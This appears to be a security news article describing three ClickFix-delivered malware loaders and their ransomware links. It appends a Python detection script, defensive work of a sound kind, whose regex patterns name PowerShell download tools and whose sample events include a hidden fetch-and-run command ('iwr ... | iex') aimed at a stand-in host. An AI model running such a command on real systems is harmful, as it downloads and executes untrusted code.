PROBABLYPWNED
Malware | July 1, 2026 | 4 min read

ClickFix Campaigns Deliver Three New Ransomware-Linked Loaders

BabaDeda, Lorem Ipsum, and Potemkin loaders emerge from ClickFix social engineering attacks, deploying infostealers and linking to Rhysida ransomware operations.

James Rivera

ClickFix-style attacks—where users are tricked into running malicious PowerShell commands—have spawned three new loader families since February. Each takes a different approach to evading detection, but they share a common endpoint: deploying stealers, RATs, and ransomware tooling.

Security researchers at Proofpoint documented BabaDeda, Lorem Ipsum, and Potemkin loaders across campaigns targeting education, finance, legal services, and construction sectors. The loaders represent an evolution in the ClickFix playbook, which has grown from a novelty social engineering trick into a reliable infection vector for multiple threat actors.

How ClickFix Works

ClickFix attacks present users with fake error messages or security warnings, then instruct them to copy and paste commands into a Run dialog or PowerShell window. The technique bypasses email attachment filters, download warnings, and mark-of-the-web protections because the user manually executes the payload.

We've seen similar social engineering tactics proliferate across phishing campaigns this year. The ClickFix variant specifically exploits user confusion around technical error messages—victims believe they're fixing a problem rather than installing malware.

BabaDeda Loader

Observed since April 2026, BabaDeda targets education and financial organizations through fake browser security updates. The loader profiles the host system before retrieving payloads, checking for Russian or Belarusian system locales and security products.

BabaDeda delivers a .NET backdoor that harvests browser artifacts, system information, and establishes encrypted command-and-control channels. Secondary payloads include DanaBot and SectopRAT, deployed via DLL side-loading through a component researchers call "Storage Crypter."

The loader traces its lineage to a crypter service first documented in November 2021, but the 2026 variant has expanded into a more capable platform with enhanced evasion and payload flexibility.

Lorem Ipsum Loader

Active since February 2026, Lorem Ipsum spreads through compromised WordPress sites in the architecture, legal services, and construction sectors. The delivery mechanism mimics Microsoft Edge security updates, prompting users to run commands that download ZIP files containing an outdated Node.js runtime (version 7.10.1 from 2017).

The attack chain runs: JavaScript dropper to batch script to DLL side-loading, culminating in the Lorem Ipsum backdoor. Proofpoint attributes this loader to Vanilla Tempest (also tracked as Rapid Brigantine or Vice Society), a threat actor with documented ties to Rhysida, BlackCat, Zeppelin, and Quantum Locker ransomware.

The choice of outdated Node.js is deliberate—older runtimes lack security hardening present in modern versions, and the specific version used predates multiple sandbox and permission improvements.

Potemkin Loader

The newest of the three, Potemkin was detected last month delivering EtherRAT and RMMProject remote access tools. Its distinguishing feature is a custom domain generation algorithm (DGA) with a built-in 1,000-word dictionary for C2 discovery.

Potemkin uses reflective in-memory module loading to avoid disk writes and implements custom byte ciphers to protect communications. Post-exploitation activity includes configuring Microsoft Defender exclusions, deploying Chisel reverse SOCKS tunnels, establishing Cloudflare tunnels, and spreading laterally across 11+ hosts using WMIExec and SMBExec.

The loader generates victim identifiers via unique UUIDs stored in %LOCALAPPDATA%\hyper-v.ver, enabling operators to track specific infections across the campaign.

Connection to Ransomware Operations

Lorem Ipsum's link to Vanilla Tempest is particularly concerning. The threat actor has operated multiple ransomware affiliate programs, and the loader chain "culminates in handoff to established post-exploitation tooling and ultimately to documented ransomware deployments, primarily Rhysida," according to researchers.

This mirrors broader trends we've covered in ransomware ecosystem reporting—initial access operations increasingly specialize, with dedicated teams handling social engineering and loader deployment before handing off to ransomware operators.

Defending Against ClickFix

User awareness remains the primary defense. Security teams should alert staff that legitimate software never asks users to paste commands into PowerShell or terminal windows. Specific mitigations include:

  1. Block PowerShell execution from Run dialogs via AppLocker or Windows Defender Application Control
  2. Monitor for powershell.exe spawned with encoded commands or web-download patterns
  3. Alert on Node.js execution from user directories
  4. Track browser extension installations via enterprise policy
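As an added example (not code from the article or from Proofpoint's research), the following Python script turns mitigations 2 and 3 above, plus the Potemkin victim-marker path mentioned earlier, into concrete detection rules and runs them over a handful of constructed process-creation events. The event fields (`image`, `command_line`, `parent_image`) are assumed to come from a Sysmon Event ID 1 or EDR process-start feed; treating an `explorer.exe` parent as a sign that the command was typed into the Run dialog or the shell is a heuristic, and the sample command lines and paths are made up for the demonstration.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

@dataclass
class ProcessEvent:
    image: str          # full path of the created process
    command_line: str   # command line as logged
    parent_image: str   # full path of the parent process

# Abbreviations PowerShell accepts for -EncodedCommand (-e, -ec, -en, -enc);
# the trailing \b keeps -ExecutionPolicy / -ep from matching.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\b")
# Common in-line download primitives seen in paste-and-run lures.
WEB_DOWNLOAD = re.compile(
    r"(?i)(invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|"
    r"downloadfile|net\.webclient|start-bitstransfer|\bcurl\b|\bwget\b|https?://)"
)
# Anything under a user profile, e.g. C:\Users\<name>\AppData\Local\Temp\...
USER_DIR = re.compile(r"(?i)^[a-z]:\\users\\[^\\]+\\")
# %LOCALAPPDATA% normally resolves to C:\Users\<name>\AppData\Local
MARKER_FILE = re.compile(r"(?i)\\appdata\\local\\hyper-v\.ver$")
POWERSHELL = ("powershell.exe", "pwsh.exe")

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev: ProcessEvent) -> List[str]:
    """Return the names of every rule the event trips (empty list = benign)."""
    findings: List[str] = []
    exe = basename(ev.image)
    if exe in POWERSHELL:
        if ENCODED_FLAG.search(ev.command_line):
            findings.append("powershell_encoded_command")
        if WEB_DOWNLOAD.search(ev.command_line):
            findings.append("powershell_web_download")
        # Heuristic (assumption): a suspicious PowerShell whose parent is the
        # shell is consistent with a user pasting into Run or a console.
        if findings and basename(ev.parent_image) == "explorer.exe":
            findings.append("launched_from_shell")
    if exe == "node.exe" and USER_DIR.match(ev.image):
        findings.append("node_from_user_directory")
    return findings

def is_potemkin_victim_marker(path: str) -> bool:
    """True for a file-create/write event on %LOCALAPPDATA%\\hyper-v.ver."""
    return bool(MARKER_FILE.search(path))

def scan(events: List[ProcessEvent]) -> List[Tuple[int, List[str]]]:
    """Index and findings for every event that matched at least one rule."""
    return [(i, f) for i, ev in enumerate(events) if (f := classify(ev))]

# Constructed sample events; the base64 blob is a harmless placeholder.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -w hidden -ep bypass -enc QUFBQUFB",
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Users\jdoe\AppData\Local\Temp\node-v7.10.1-win-x64\node.exe",
                 "node.exe update.js",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\scripts\inventory.ps1",
                 r"C:\Windows\System32\svchost.exe"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell.exe -w hidden -c "iwr http://example.invalid/stage1.ps1 | iex"',
                 r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
    print("marker:", is_potemkin_victim_marker(r"C:\Users\jdoe\AppData\Local\hyper-v.ver"))
```

The scheduled inventory script (event 2) produces no findings even though it runs with a bypassed execution policy, which is the point of keying on encoded or downloading command lines rather than on PowerShell itself; in production the same rules would be expressed as a SIEM query or EDR custom rule, with the `launched_from_shell` hit used to raise severity rather than as a stand-alone alert.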

For organizations in targeted sectors—education, finance, legal, construction—the threat level warrants proactive hunting for BabaDeda, Lorem Ipsum, and Potemkin indicators. The loaders' connection to ransomware operations elevates the risk beyond typical infostealer infections.
